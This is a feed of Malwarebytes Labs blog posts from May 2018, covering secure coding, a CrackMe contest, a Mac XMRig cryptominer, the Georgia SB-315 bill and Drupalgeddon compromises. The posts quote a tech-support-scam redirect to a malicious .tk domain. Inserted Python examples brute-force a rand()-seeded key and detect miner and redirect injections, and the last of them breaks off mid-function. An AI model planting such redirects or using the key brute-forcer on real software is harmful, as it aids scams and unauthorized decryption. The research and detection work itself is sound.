Techie Feeds

Why bad coding habits die hard—and 7 ways to kill them

Malwarebytes - Wed, 05/23/2018 - 15:00

Developers are usually the focus of blame when software vulnerabilities cause organizational breaches. (Sometimes, quality assurance engineers are included in the blame.) Interestingly, though, hardly anyone looks at why bad coding habits form in the first place.

We’re talking about the culture, the processes, the unrealistic deadlines, and—perhaps the worst of this bunch—the lack of awareness between the business and development sides. The former must realize that as they innovate, they need to adapt and respond to the ever-changing threat landscape; the latter must know how to write good, clean, secure code.

Reasons why programmers fail at security

Each organizational breach is a testament to something going wrong somewhere. And it’s a lot more complicated than assuming developers are just lazy at coding. To understand what’s really going on, we’ve listed some of the reasons why programmers appear not to care about secure coding when, in fact, they do.

They don’t know what secure code looks like.

Most of us assume that programmers, well-versed in multiple programming languages as they are, should also know how to write secure code. This just isn’t true. According to a study conducted by CloudPassage a couple of years ago, none of the top 10 computer science programs in the US require a cybersecurity course—not even an elective one—for graduation.

While computer science, information systems, and computer engineering students are taught how to code, accredited schools are simply not teaching them security by design. Secure coding is something programmers must now teach themselves.

They don’t have enough time to spend on security.

Software developers are expected to adhere to rigid deadlines. No ifs, ands, or buts. On top of this, they also have to balance conflicting interests from multiple stakeholders, refine code functionality, and ensure that the program is reliable and stable. Programmers have to tick several more boxes before reaching the bottom of the list, where security sits. In practice, it’s common for programmers to skip security checks and deploy the program as-is: a working, efficient, but vulnerable product.

Essentially, it’s half-baked.

They lack the tools needed to identify security risks.

As much as software developers would want to keep their code as risk-free as possible, they cannot. The tools needed for this are expensive and can be a hard sell for organizations that have budget constraints or who utterly fail to grasp the importance of reducing software vulnerabilities.

Leading the charge

Vulnerable software is the bane of business organizations. In this age of breaches, you’d think it’s only logical for organizations to secure vulnerable software, starting with their own. Yet, bad code remains prevalent to this day. It’s up to management to take charge and prioritize security in the development process. By adopting any or all of these suggestions to eradicate bad code, businesses can not only help software developers do a better job, but also potentially secure their reputation, data, and ongoing survival.

Shall we begin?

Train developers to write secure code.

Training is perhaps the best and most effective way to get software developers to improve their coding. To do this, management has several options: invite a third-party organization to conduct training, have their software engineers enroll in workshops outside of the workplace, or have them register for online classes.

Should they decide to hire a third party, there are some private institutions they can turn to. WhiteHat Security, for example, has a program where developers who finish the requirements and pass the exam can be certified as a WhiteHat Certified Secure Developer (WCSD). SANS and CERT follow a similar method. It’s crucial that developers use secure coding in every stage of the company’s software development lifecycle (SDLC).

Introduce a standard coding convention.

Depending on the programming languages your developers are using, upper management must establish secure coding standards they can adhere to. Thankfully, they don’t have to start from scratch. There are a lot of sources online they can begin looking into, adapt as-is, or modify to fit their needs.

A convention includes recommended programming styles, methods, and other coding practices. Adhering to one significantly lessens errors, makes the source code readable to other programmers, and is easier to maintain in the long run.

Create a culture of security.

Make no mistake: secure coding should be as important to company culture as it is to the overall software development process. The aim of having such a culture is to instill security practices so deeply that they become second nature. These practices grow into valuable traits programmers can take with them anywhere.

As we keep saying, security is no longer the job of one department in a company. It is now everyone’s job to ensure that sensitive client information is kept safe and secure, and to think twice before clicking that link or opening that email attachment. If security is stressed as an important part of company culture, that mindset can extend beyond staving off breaches to keeping your customers just as safe.

Read: How to create an intentional culture of security

Create a security policy.

A policy is vital to have, as it guides software developers not only on what security features to bake into their applications, but also on how these should be implemented. Unfortunately, organizations often overlook this, leaving their applications, intellectual property, and other vital information open to compromise. Embedding a security policy into the SDLC is a must. If the company makes its product available to the European market, then building GDPR requirements into the SDLC is essential as well.

Conduct an internal bug bounty program.

Bug bounties in general are a form of security crowdsourcing that allows people to check software and systems for flaws. Monetary compensation and/or recognition are awarded to those who find flaws deemed critical. Upper management may opt to use this scheme once the product has passed through the QA and security teams, in the hope of further reducing exploitable vulnerabilities. If they wish, they can also hold a bug bounty program for non-employees.

Set a realistic schedule.

Rigid timelines may get the job done, but they also encourage sloppy coding. A finished product doesn’t mean it’s a secure one. If security checks on code are usually ignored because of the project schedule, wouldn’t it be better for project managers to set the timeline with a little padding in case something happens and the target date isn’t met?

Today’s threat landscape no longer allows for half-baked applications. A slight schedule slip can be remedied, but a breach due to flaws that a code review would have caught could cause far more problems and unnecessary expense for the company.

Continue to motivate developers to write good code.

This can be done by creating an environment where developers are not only required to meet standards, but want to. One way is ensuring that software programmers have the tools and equipment they need. Mobile app developers, for example, may need several phones and tablets to test on.

Upper management must also work closely with team and project leaders to provide programmers access to necessary information they need for the project and people they can reach out to for advice. Other things that are important to developers are ergonomic furniture, a fast PC, a personal space where they can work quietly and privately, writing materials and whiteboards, and an R&R area where they can meet with other employees. Should upper management set up an incentive program for good coding? It might be the natural step to take—although, it might actually do more harm than good, so have a good think.

A word on brogramming: one may think its presence within a company is harmless, but in reality it hurts the organization, as developers outside a particular clique, especially women, are excluded and made to feel unwelcome. At times, brogramming may even spark bullying in the workplace. Upper management must never cater to this subculture if they want to make the environment welcoming to all programmers, and the company a place where employees can do their jobs without discrimination.

Welcoming the change

Every company looking to improve their overall security posture, beginning with addressing the problem of bad code, should know that a 100 percent turnaround isn’t possible at the onset. Change is usually slow. However, after about a year of baking security into the coding process, expect a significant return on investment. That was the finding of a study by the Aberdeen Group on companies adopting secure coding practices.

Code that works is well-designed, efficient, usable, readable, and (most importantly) secure. It is not impossible to achieve. All organizations have to do is start getting rid of bad coding habits.

The post Why bad coding habits die hard—and 7 ways to kill them appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malwarebytes CrackMe 2: contest summary

Malwarebytes - Tue, 05/22/2018 - 16:00

About three weeks ago, we published our second CrackMe. It triggered a lot of interest, and we got many high-quality write-ups. Choosing the winner was really difficult!

In this post, I am going to summarize the contest and comment on the received submissions.

CrackMe 2 challenge

The topic of the challenge was Python, and its goal was to teach how Python scripts can be packaged and integrated with native executables. The Python script involved was not obfuscated, and the user was supposed to adapt it for the purpose of finding the solution.

The CrackMe was made of three components, cooperating with each other:

  • a Python script (converted to EXE with the help of PyInstaller)
  • a native DLL, loaded with the help of the above script
  • a Python script unpacked by the DLL and injected into Actxproxy.dll

In the first level, the user was supposed to find a valid PIN to decode a URL, from which the next level was downloaded. The next level was a native DLL that was injected into the main PyInstaller-based EXE by the initial script.

After the second level was passed, the DLL was unpacking another piece of obfuscated Python script and injecting it into the header of Actxproxy.dll. When the DLL finished and the execution was passed back to the main script, the chunk of data was read from Actxproxy.dll, decoded, and executed. So, the Actxproxy.dll was used not as a DLL, but rather as a named memory area where the data was covertly passed from one component to another.

There were a number of other techniques used, such as:

  • A covert way to host and download a PE file: the PE was encoded as an image (with file2png.py) and hosted on an image-hosting site
  • A reflective loader (based on Stephen Fewer’s template)
  • A modified PE header, thanks to which the PE file can be injected like a piece of shellcode
  • Changing the execution flow with the help of exception handlers
  • Using a pseudo-random sequence as an AES key (taking advantage of the fact that the standard function rand() is not really random: a sequence generated from the same seed will always be the same)
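
Why the rand()-seeded key is weak, as an added illustration (this is not code from the CrackMe or from any of the write-ups): the generator below models the MSVC CRT rand() recurrence, which is an assumption, since the post does not say which C runtime the DLL was built with. The same seed reproduces the same key bytes, so an attacker brute-forces the small seed space rather than the 128-bit key. The MD5 check value and the 16-bit seed are constructed for the demo; in the CrackMe the oracle is “decrypt the next stage and see whether the output looks like what you expect”.

```python
"""Added example (not code from the CrackMe or its write-ups): why a key
derived from rand() is recoverable by brute-forcing the seed.

The PRNG modelled here is the MSVC CRT rand() recurrence. That is an
assumption; the post does not name the C runtime. The argument holds for
any deterministic generator.
"""
import hashlib
from typing import Callable, Iterable, Optional


class MsvcRand:
    """MSVC CRT rand(): state = state * 214013 + 2531011 (mod 2^32);
    rand() returns (state >> 16) & 0x7fff. srand(1) yields 41, 18467, ..."""

    def __init__(self, seed: int) -> None:
        self.state = seed & 0xFFFFFFFF

    def rand(self) -> int:
        self.state = (self.state * 214013 + 2531011) & 0xFFFFFFFF
        return (self.state >> 16) & 0x7FFF


def derive_key(seed: int, length: int = 16) -> bytes:
    """Naive key generation: srand(seed), then one low byte of rand() per key byte."""
    rng = MsvcRand(seed)
    return bytes(rng.rand() & 0xFF for _ in range(length))


def recover_seed(oracle: Callable[[bytes], bool], seeds: Iterable[int],
                 length: int = 16) -> Optional[int]:
    """Derive the key each candidate seed would have produced and ask the oracle
    whether it is right. The oracle is whatever check the target exposes: here an
    MD5 of the key; in a crackme it is usually 'decrypt the next stage and check
    that the result looks like valid Python or a PE'."""
    for seed in seeds:
        if oracle(derive_key(seed, length)):
            return seed
    return None


def demo() -> Optional[int]:
    """Constructed scenario: the program seeded rand() with a 16-bit value and
    left an MD5 of the resulting key as its check value."""
    true_seed = 8002
    check_digest = hashlib.md5(derive_key(true_seed)).hexdigest()

    def oracle(candidate_key: bytes) -> bool:
        return hashlib.md5(candidate_key).hexdigest() == check_digest

    # 2^16 seeds x 16 rand() calls is trivial. A time(NULL)-seeded key falls
    # the same way: iterate the plausible timestamp window instead of range().
    return recover_seed(oracle, range(1 << 16))


if __name__ == "__main__":
    print("same seed, same key:", derive_key(1) == derive_key(1))
    print("recovered seed:", demo())
```

The lesson for the write-ups’ item about rand() is the search space: the key looks like 128 random bits, but its entropy is that of the seed, and a seed that is a timestamp or a small constant is enumerable in seconds.
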

Statistics

The CrackMe has so far been downloaded 956 times (653 of those were in the first weekend after the release).

We had people from all around the world participating. The most downloads were from the US (243), Israel (59), and the UK (52).

Hall of fame

The submission was counted as valid if it contained the final flag:

flag{“Things are not always what they seem; the first appearance deceives many; the intelligence of a few perceives what has been carefully hidden.” – Phaedrus}

In total, I got flags from 25 people. Congratulations to all of you, you did great!

12 people solved it during the first weekend:

    1. [write-up]
    2. [write-up]
    3. [write-up]
    4. [write-up]
    5. [write-up]

The remaining 13 solved it in the following days:

  1. May 1:
  2. May 1:
  3. May 2: [write-up] [video]
  4. May 2:
  5. May 2: [write-up]
  6. May 2:
  7. May 3:
  8. May 3: [write-up]
  9. May 3: [write-up]
  10. May 6:
  11. May 10: [write-up]
  12. May 15: [write-up]
  13. May 18: [write-up]

Write-up scoring

Due to the high quality of the received write-ups, it was hard to select the winner. In order to introduce some objective measures, several categories were used to assign points.

The first category involved an in-depth explanation of the inner workings of the CrackMe, guiding through the process of solving. This means writers should have:

  1. Explained how to identify that the executable is in reality a wrapped Python script
  2. Provided tools and an explanation of how to unpack the PyInstaller executable back to Python script
  3. Demonstrated how to recover the password from its MD5 hash
  4. Explained why the key, although generated with rand(), is not really random
  5. Provided and explained the source code of a brute-forcer for the PIN
  6. Explained how the PE file is decoded from the image
  7. Noticed and understood the PE header modification (shellcodified PE)
  8. Noticed and understood the reflective loader in the DLL
  9. Explained how the VEH was used to modify the execution flow
  10. Noticed what checks were made to prevent the DLL from running outside the Python process
  11. Explained the mechanism behind the “secret console”
  12. Explained how Actxproxy.dll is used as a communication channel between the two independent modules
  13. Analyzed the injected data and minimized the set of characters that had to be brute-forced
  14. Explained what (and why) to expect in the output (in level 3 decoding)
  15. Provided and explained the script used to solve the final Python chunk
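
How a write-up could show item 1 and part of item 2 in code, as an added example that is not from the post or from any submission: PyInstaller leaves a cookie at the end of the overlay (magic MEI\x0c\x0b\x0a\x0b\x0e, package length, TOC offset, TOC length, Python version, Python DLL name), and inside the archive a table of contents made of '!iiiiBc' + name entries. The field layout below is reconstructed from memory of PyInstaller 2.1 to 3.x and the sample binary is built in-line; it is not the CrackMe executable.

```python
"""Added example (not from the post or any write-up): identify a PyInstaller-
wrapped EXE from its CArchive cookie and list what it packages.
Layout per PyInstaller 2.1-3.x as recalled by the writer of this example."""
import struct
from typing import Dict, List, Optional

MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"                 # PyInstaller CArchive cookie magic
COOKIE_FMT = "!8siiii64s"                           # magic, pkg_len, toc_off, toc_len, pyver, pylib name
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)           # 88 bytes
ENTRY_FMT = "!iiiiBc"                               # entry_len, data_off, cdata_len, udata_len, compressed, typecode
ENTRY_FIXED = struct.calcsize(ENTRY_FMT)            # 18 bytes, followed by the NUL-terminated name
TYPECODES = {b"s": "script", b"m": "module", b"M": "package", b"z": "PYZ",
             b"b": "binary", b"x": "data", b"o": "option"}


def detect_pyinstaller(data: bytes) -> Optional[Dict]:
    """Return cookie fields and the archive TOC, or None when this is not a PyInstaller PE."""
    if data[:2] != b"MZ":               # the CrackMe is a Windows EXE; ELF/Mach-O would need a different stub check
        return None
    pos = data.rfind(MAGIC)            # the cookie sits at the end of the overlay, so search backwards
    if pos < 0 or len(data) - pos < COOKIE_SIZE:
        return None
    _, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack(COOKIE_FMT, data[pos:pos + COOKIE_SIZE])
    # pkg_len counts the whole archive up to and including the cookie, so the archive starts here;
    # anything after the cookie (an appended signature, say) is ignored.
    start = pos + COOKIE_SIZE - pkg_len
    if start < 0 or start + toc_off + toc_len > len(data):
        return None
    toc = data[start + toc_off:start + toc_off + toc_len]
    entries: List[Dict] = []
    off = 0
    while off + ENTRY_FIXED <= len(toc):
        entry_len, data_off, clen, ulen, compressed, typecode = struct.unpack(ENTRY_FMT, toc[off:off + ENTRY_FIXED])
        if entry_len < ENTRY_FIXED:
            break                        # corrupt TOC; stop rather than loop forever
        name = toc[off + ENTRY_FIXED:off + entry_len].rstrip(b"\0").decode("utf-8", "replace")
        entries.append({"name": name, "type": TYPECODES.get(typecode, typecode.decode("latin-1")),
                        "compressed": bool(compressed), "offset": start + data_off, "size": ulen})
        off += entry_len
    return {"pyver": pyver, "pylib": pylib.rstrip(b"\0").decode("ascii", "replace"), "entries": entries}


def scripts(info: Dict) -> List[str]:
    """The 's' entries are the packaged scripts; the last one is normally the program's own entry point."""
    return [e["name"] for e in info["entries"] if e["type"] == "script"]


def build_sample() -> bytes:
    """Constructed stand-in for a PyInstaller-packed EXE: a dummy PE stub followed by a tiny CArchive."""
    stub = b"MZ" + b"\0" * 62 + b"<dummy PE image>" + b"\0" * 48
    items = [(b"pyiboot01_bootstrap", b"m", b"import sys\n"), (b"crackme", b"s", b"print('level 1')\n")]
    payload, toc = b"", b""
    for name, code, body in items:
        toc += struct.pack(ENTRY_FMT, ENTRY_FIXED + len(name) + 1, len(payload), len(body), len(body), 0, code) + name + b"\0"
        payload += body
    pkg_len = len(payload) + len(toc) + COOKIE_SIZE
    cookie = struct.pack(COOKIE_FMT, MAGIC, pkg_len, len(payload), len(toc), 27, b"python27.dll")
    return stub + payload + toc + cookie


if __name__ == "__main__":
    info = detect_pyinstaller(build_sample())
    print("python version:", info["pyver"], "runtime:", info["pylib"])
    print("scripts:", scripts(info))
```

The Python version field matters for the next step: the .pyc bodies you carve out of the archive have no header, and you need the matching interpreter version to prepend the right magic before a decompiler will accept them.
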

The second category was style. Writers should have:

  1. Introduced tools before they were used, showing the environment setup
  2. Provided detailed explanation of the used techniques, reaching beyond the CrackMe itself. For example, providing links where the reader can learn more.
  3. Provided graphical illustration of the taken steps. Diagrams, GIFs, videos, etc.
  4. Been especially clear and had a pleasant writing style

You could also get some bonus points for OSINT if you found:

  1. My tool that does exactly the same conversion as used in the CrackMe (file2png.py)
  2. My post explaining in detail how to unpack a PyInstaller-based EXE
  3. Malware that previously used any of the described techniques (e.g., the shellcodified PE was used by the Shakti Trojan, a PyInstaller package was used by the Telegram RAT, and reflective loaders are commonly used by multiple malware families, for example the dropper of the original Petya)

Points per write-up (plus, their extra features that gave a bonus point)

  1. @Hexacorn’s write-up: 8
  2. @_qaz_qaz’s writeup: 13.5
  3. @pieceofsummer’s write-up: 8
  4. @KernelM0de‘s write-up: 8.5
  5. @Eleemosynator’s write-up: 16
  6. @LadislavZezula‘s write-up and video: 13.5
    • adding the video to the write-up was really cool!
  7. @tqkve’s write-up: 7.5
    • interesting explanation how to manually extract the pyc module from PyInstaller-based EXE
  8. @voidm4p‘s write-up: 12.5
  9. @ravitiwari1989’s write-up: 13.5
  10. @Jacob_Pimental’s write-up: 8
  11. @th3m4ks’s write-up: 12.5
  12. @nictln’s write-up: 12
    • the best way to solve the last stage: a known-plaintext attack instead of brute force

The write-ups showed a diversity of ideas, each of them providing a fresh perspective and a valuable source of learning for people who want to enter our field. Thank you so much for your participation! As a small token of our appreciation, we decided to give Malwarebytes swag to each write-up author! You can contact me via Twitter for details.

Winners

I decided to reward four authors, whose solutions stood out:

  • @Eleemosynator
  • @ravitiwari1989
  • @_qaz_qaz
  • @LadislavZezula

Each winner can choose a book of their liking (in a printed or electronic form). Contact me on Twitter for receiving the reward. Congratulations again, and thank you for all the work that you put in writing the solution!

The post Malwarebytes CrackMe 2: contest summary appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New Mac cryptominer uses XMRig

Malwarebytes - Tue, 05/22/2018 - 15:00

A new Mac cryptominer was discovered this week, after affected users saw their fans whirring out of control and a process named “mshelper” gobbling up CPU time like Cookie Monster. Fortunately, this malware is not very sophisticated and is easy to remove.

The malware became public knowledge in a post on Apple’s discussion forums, where the “mshelper” process was found to be the culprit. Digging deeper, it was discovered that there were a couple of other suspicious processes installed as well. We went searching and found copies of these files.

The malware is mining for Monero cryptocurrency. Here’s a breakdown of its components.

The dropper

A “dropper” is what security researchers call the program that installs malware. Often, Mac malware is installed by things like fake Adobe Flash Player installers, downloads from piracy sites, decoy documents users are tricked into opening, and other such things.

In this case, the dropper is still unknown, but we do not believe it’s anything sophisticated. Everything else about this malware suggests simplicity.

The launcher

A file named pplauncher is installed in the following location:

~/Library/Application Support/pplauncher/pplauncher

This file is kept running by a launch daemon (com.pplauncher.plist), indicating that the dropper must have had root privileges.

pplauncher is a rather large executable file (3.5 MB) that was written in Golang and then compiled for macOS. The sole responsibility of this process appears to be the fairly simple task of installing and launching the miner.

Using Golang introduces significant overhead, resulting in a binary file containing more than 23,000 functions. Using this for what appears to be simple functionality is probably a sign that the person who created it is not particularly familiar with Macs.

pplauncher SHA256: 8f1938d082393713539abb9dfa8bfde8e1a09721f622e6e597d4560219ffca0d

The miner

The miner is the mshelper process, which is installed here:

/tmp/mshelper/mshelper

This process appears to be an older version of the legitimate XMRig miner, which can be installed on Macs via Homebrew. Getting the version information from the current XMRig gives the following results:

$ xmrig -V
XMRig 2.6.2
 built on May  7 2018 with clang 9.0.0 (clang-900.0.39.2)
 features: 64-bit AES

Requesting the same information from the mshelper process gives the following results:

$ /tmp/mshelper/mshelper -V
XMRig 2.5.1
 built on Mar 26 2018 with clang 9.0.0 (clang-900.0.39.2)
 features: x86_64 AES-NI

Clearly, mshelper is simply an older copy of XMRig that is being used for the purpose of generating the cryptocurrency for the hacker behind the malware. The pplauncher process provides the necessary command-line arguments, such as the following parameter specifying the user, found using the strings command on the pplauncher executable file:

--user=19531259765625

mshelper SHA256: a00f6fbb2e00d35f938534e1c20ba2e02311536bcf60be2165037d68cba141b2

Mac cryptomining on the rise

This malware is not particularly dangerous, unless your Mac has a problem like damaged fans or dust-clogged vents that could cause overheating. Although the mshelper process is actually a legitimate piece of software being abused, it should still be removed along with the rest of the malware.

Mac cryptomining malware has been on the rise recently, just as in the Windows world. This malware follows other cryptominers for macOS, such as Pwnet, CpuMeaner, and CreativeUpdate. I’d rather be infected with a cryptominer than some other kind of malware, but that doesn’t make it a good thing.

If you think you’re infected with this malware, Malwarebytes for Mac will remove it. We detect this malware as OSX.ppminer.

The post New Mac cryptominer uses XMRig appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (May 14 – May 20)

Malwarebytes - Mon, 05/21/2018 - 17:17

Last week, we looked at the deluge of incoming policies caused by GDPR, tackled Adobe Reader zero days, and ran through some iPhone security tips. We also caught some helpline scammers in the act, explored advergaming, got our Senate Bill game face on, and deep dived into Drupal vulnerabilities.

Other news

Stay safe, everyone!

The post A week in security (May 14 – May 20) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Vote for Malwarebytes Labs: European Security Blogger Awards 2018

Malwarebytes - Mon, 05/21/2018 - 15:00

It’s nearly time for Infosec Europe 2018, and that means it’s also time to consider voting for your favourite security blogs, podcasts, video channels, and more for the upcoming European Security Blogger Awards.

Thanks to your generous votes, we’ve been fortunate enough to pick up the award for Best Corporate Security Blog in both 2015 and 2016. This year, our blog is nominated for Best Corporate Security Blog (Category 1) again, and my personal Twitter account is up for nomination in the Best EU Security Tweeter (Category 11).

We’re up against some stiff competition in the Corporate category:

BH Consulting SecurityWatch

Security Now

Sophos Naked Security Blog

Eperi Blog

We Live Security 

The AlienVault Blogs

BitDefender

IT Security Guru 

DomainTools Blog

We’re honoured to be included among such great company, and to have the chance to take our European Security Blogger Awards tally to three. We do our best to provide readers with a non-stop mix of deep-dive security analysis, breaking news, how-to content, and cybersecurity awareness. We’re proud to do our part, whether that’s helping researchers in the trenches battle malware makers or giving customers the know-how they need to shut down scammers.

Should you wish to vote for us, please go here and select your categories of choice.

Voting closes at midnight GMT on Friday, June 1. There’s a few weeks left to show your support, and we’re grateful for each and every vote you cast our way!

The post Vote for Malwarebytes Labs: European Security Blogger Awards 2018 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Why tech companies wanted Senate Bill 315 vetoed

Malwarebytes - Fri, 05/18/2018 - 16:00

When Georgia Senate Bill 315 (SB-315) was introduced, people in the tech world anxiously awaited its fate, regardless of their geographic location. They knew that some laws initially restricted to single states become more widespread after politicians set precedents. And they knew that this law could potentially impact the way that they did business forever.

The bill passed in the General Assembly on March 29—and that was not the news tech companies were looking for. They hoped the bill would be shot down. But why?

The bill

SB-315 was a Republican-sponsored bill aiming to alter the state’s parameters on computer usage. If passed, it would have amended the original language of Georgia’s code that discusses “computer trespass.” The activities under that umbrella include deleting computer programs or data, altering or damaging hardware, and obstructing the use of a computer program. In short, Georgia’s existing code only treated unauthorized use as a crime when there was malicious intent.

However, SB-315’s language is much more vague than the original Georgia code. It prohibits unauthorized computer access—period—although it doesn’t apply to people living in the same house, individuals using computers for legitimate business activities, or those engaged in active cyberdefense measures that stop or detect unauthorized use.

What prompted SB-315?

A security researcher named Logan Lamb found a vulnerability associated with Kennesaw State University’s (KSU) Center for Election Systems that exposed the details of 6.7 million voters in Georgia. He contacted the appropriate authority and received word that the issue would get fixed. A year later, Chris Grayson, a fellow cybersecurity researcher, found the vulnerability still existed.

Next, both Lamb and Grayson approached a KSU information security lecturer about the matter. That action finally got the problem fixed. Unfortunately, it also resulted in Lamb getting visited by FBI agents. They determined he didn’t do anything wrong but advised him to delete any downloaded data.

Lamb’s efforts to help protect that data would now be considered illegal under SB-315.

Tech companies raise concerns

Microsoft and Google are among the technology companies that urged Georgia governor Nathan Deal to veto the bill. In a joint letter distributed to Deal on April 15, representatives from tech companies took issue with criminalizing unauthorized computer access, saying the consequences could be damaging to Georgia’s infosec industry. They also argued against the provision of the bill that makes “hack backs” exempt.

The tech representatives asserted that the provision as written was too broad and its parameters were not clearly defined. As such, they saw a strong potential for abuse for anti-competitive purposes rather than solely to protect networks. They also said that enabling Georgia businesses to “hack back” against cybercriminals could have unintended consequences.

In addition, cybersecurity company Tripwire filed a letter with the governor’s office on April 16, arguing that SB-315 would ultimately weaken security. “SB-315 will discourage good actors from reporting vulnerabilities and ultimately increase the likelihood that adversaries will find and exploit the underlying weaknesses,” the letter said.

Potential ramifications for cybersecurity researchers

In a separate letter to Congress, 55 tech professionals warned that the “legitimate business activity” exemption of the bill was dangerously unclear. The letter stated that this term “is undefined and creates ambiguity for researchers unconnected with a business…and how activities will be qualified as ‘legitimate.’”

Experts say SB-315 would have had a chilling effect on independent researchers, specifically those that perform penetration tests. Sometimes referred to as whitehat hackers, these cybersecurity specialists look for network weaknesses and find out what would happen if they were exploited.

After collecting the results of penetration tests, the researchers contact the appropriate parties to inform them of vulnerabilities. However, some people in the cybersecurity sector wondered if by disclosing the outcomes of penetration tests, researchers would violate SB-315 and risk fines or jail time.

Hackers showed their displeasure for SB-315 by hacking several Georgia websites, including the homepages of a church and two restaurants. In all cases, the infiltrators left messages on the sites to warn that SB-315 barred the ethical reporting of the vulnerabilities that allowed the attacks.

Nods of approval for SB-315

Chris Carr, the attorney general for the state of Georgia, issued a statement after SB-315 passed in the General Assembly that outlined his support of the bill. He asserted that Georgia is one of only three states that don’t make unauthorized computer or network access without malicious intent illegal.

Carr referred to SB-315 as a “common sense solution” that would close off opportunities hackers would otherwise seize. Moreover, his press release expressed gratitude to other sponsors of the bill, including Representative Christian Coomer, and Senators Renee Unterman and Butch Miller, among others.

Senator Bruce Thompson, who introduced the bill, largely steered clear of any controversy when discussing SB-315 on his Twitter feed.

At the end of March, though, one of his tweets mentioned Chairman Ed Seltzer. When the bill was on the House floor, Seltzer reportedly said the exemptions were “big enough to drive a truck through.” That was presumably Thompson’s way to respond to critics who thought the exceptions to the bill were too narrow in scope.

Representative Tom Graves, who sponsored the bill, stated that SB-315 would provide citizens and businesses with more resources to stay safe against hacks.

Deal gives his veto

Governor Nathan Deal ultimately chose to veto SB-315. In a related statement, he mentioned that such legislation requires further discussion before enactment. Additionally, he brought up private industries and government agencies, admitting that SB-315 could make it more difficult for those entities to stay protected.

Deal hoped legislators would continue to work together to find ways to enhance the state and national security against cyberattacks.

The concerns of tech companies about the language and specific provisions of SB-315 emphasize why it’s crucial to conduct all-encompassing analyses of pending legislation. The full impacts of proposed laws are not always immediately evident—especially when it comes to technology.

The post Why tech companies wanted Senate Bill 315 vetoed appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A look into Drupalgeddon’s client-side attacks

Malwarebytes - Fri, 05/18/2018 - 15:00

Drupal is one of the most popular Content Management Systems (CMS), along with WordPress and Joomla. In late March 2018, Drupal was affected by a major remote code execution vulnerability (CVE-2018-7600) followed by yet another (CVE-2018-7602) almost a month later, both aptly nicknamed Drupalgeddon 2 and Drupalgeddon 3.

These back-to-back vulnerabilities were accompanied by proofs of concept that translated into almost immediate real-world attacks. For many website owners, this situation was frustrating because the window of time to patch is getting considerably smaller. Additionally, updating or upgrading Drupal (or any other CMS, for that matter) may have side effects, such as broken templates or functionality, which is why you need to make a full backup and test the changes in a staging environment before moving to production.

Rolling out a CMS is usually the easy part. Maintaining it is where most problems occur, due to lack of knowledge, fear of breaking something, and, of course, costs. While it is each site owner’s responsibility to do due diligence on their web properties, the outcome is all too often websites that are severely out of date and exploited, often more than once.

Sample set and web crawl

We decided to look at a number of web properties that had not yet been checked (running any version of Drupal, vulnerable or not). Our main source of URLs was Shodan, complemented by PublicWWW, for a total of roughly 80,000 URLs to crawl. We were surprised to start hitting compromised sites early in the process and were able to confirm over 900 injected web properties.

Many of the results were servers hosted on Amazon or other cloud providers that were most likely set up for testing purposes (staging) and never removed or upgraded. Thankfully, they received little to no traffic. The other domains we encountered spanned a variety of verticals and languages, with one common denominator: an outdated version (usually severely outdated) of the Drupal CMS.

Figure 1: Crawling and flagging compromised Drupal sites using Fiddler

Drupal versions

At the time of this writing, there are two recommended releases for Drupal. Version 8.x.x is the latest and greatest with some new features, while 7.x.x is considered the most stable and compatible version, especially when it comes to themes.

Figure 2: Drupal’s two main supported branches

Almost half the sites we flagged as compromised were running Drupal version 7.5.x, while version 7.3.x still represented about 30 percent, a fairly high number considering it was last updated in August 2015. Many security flaws have been discovered (and exploited) since then.

Figure 3: Percentage of compromised sites belonging to a particular Drupal version

Payloads

A large number of Drupal sites that have been hacked via these two recent exploits were also infected with server-side malware, in particular with XMRig cryptocurrency miners. However, in this post we will focus on the client-side effects of those compromises. Neither are exclusive though, and one should expect that a hacked site could be performing malicious actions on both server and client side.

Unsurprisingly, web miners were by far the most common type of injection we noticed. But we also came across a few different social engineering campaigns.

Figure 4: Breakdown of the most common payloads

Web miners

Drive-by mining attacks went through the roof in the fall of 2017 but slowed down somewhat at the beginning of the year. It’s safe to say that the recent Drupal vulnerabilities have added fuel to the fire and resulted in increased activity. Coinhive injections remain by far the most popular choice, although public or private Monero pools are gaining traction as well.

We are seeing the same campaign that was already documented by other researchers in early March; it is ensnaring more victims by the day.

Figure 5: A subdomain of Harvard University’s main site mining Monero

Fake updates

This campaign of fake browser updates, which we documented earlier, is still going strong. It distributes a password stealer or Remote Administration Tool (RAT).

Figure 6: A compromised Drupal site pushing a fake Chrome update

Tech support scams (browlocks)

Redirections to browser locker pages are a typical approach for delivering tech support scams. The most common redirection we were able to document involved an intermediary site redirecting to browser locker pages using the .TK Top Level Domain (TLD).

mysimplename[.]com/si.php
    window.location.replace("http://hispaintinghad[.]tk/index/?1641501770611");
    window.location.href = "http://hispaintinghad[.]tk/index/?1641501770611";

Figure 7: A compromised Drupal host redirecting to a browser locker page

Web miners and injected code

We collected different types of code injection, from simple and clear text to long obfuscated blurbs. It’s worth noting that in many cases the code is dynamic—most likely a technique to evade detection.
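As an added example (not code from the post), the following Python scanner flags the two client-side injections described here, the browlock redirect quoted above and the web miner injections: script tags or inline constructors that use the Coinhive and Crypto-Loot file names the post mentions, and inline window.location redirections to a host other than the site's own. The sample HTML and the 32-character site key in it are constructed placeholders, not a real capture.

```python
"""Flag the two client-side injections the post describes in a page's HTML:
web miner scripts/keys and browser-locker redirects (added example, not
code from the post)."""
import re
from html.parser import HTMLParser

# Script file names used by the Coinhive and Crypto-Loot miners named in the post.
MINER_SCRIPT_NAMES = ("coinhive.min.js", "cryptonight.wasm",
                      "worker-asmjs.min.js", "justdoit2.js")
# Coinhive's public API takes a 32-character site key in its constructor.
MINER_KEY_RE = re.compile(r"new\s+CoinHive\.\w+\(\s*['\"]([A-Za-z0-9]{32})['\"]")
# Inline redirections of the kind quoted from mysimplename[.]com/si.php above.
REDIRECT_RE = re.compile(
    r"window\.location(?:\.href\s*=|\.replace\()\s*['\"](https?://[^'\"]+)['\"]")


def _host(url):
    """Host of an absolute or protocol-relative URL. A plain regex is used so
    that defanged hosts such as example[.]tk are accepted as well."""
    m = re.match(r"(?:https?:)?//([^/?#]+)", url)
    return m.group(1).lower() if m else ""


def _basename(url):
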